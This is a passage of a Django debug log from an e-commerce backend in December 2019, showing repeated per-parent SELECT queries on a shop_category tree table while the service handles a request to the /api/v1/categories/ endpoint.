14:07:23,385 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:07:23,388 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:07:23,391 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:07:23,393 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:07:23,396 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:07:23,398 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:07:23,401 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:07:23,404 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:07:23,406 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:07:23,408 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:07:23,410 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:07:23,414 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:07:23,416 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:07:23,418 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:07:23,421 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:07:23,423 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:07:23,425 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:07:23,428 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:07:23,430 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:07:23,432 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:07:23,435 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:07:23,437 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:07:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:08:45,547 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:08:45,556 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:08:45,562 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:08:45,566 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:08:45,572 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:08:45,575 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:08:45,578 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:08:45,582 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:08:45,585 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:08:45,590 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:08:45,593 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:08:45,597 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:08:45,600 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:08:45,603 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:08:45,609 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:08:45,612 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:08:45,615 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:08:45,618 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:08:45,622 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:08:45,627 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:08:45,630 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:08:45,633 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:08:45,637 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:08:45,640 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:08:45,643 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:08:45,647 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:08:45,650 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:08:45,654 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:08:45,657 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:08:45,660 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:08:45,664 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:08:45,667 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:08:45,671 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:08:45,674 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:08:45,677 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:08:45,682 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:08:45,685 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:08:45,688 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:08:45,691 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:08:45,694 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:08:45,697 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:08:45,701 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:08:45,704 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:08:45,707 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:08:45,711 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:08:45,714 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 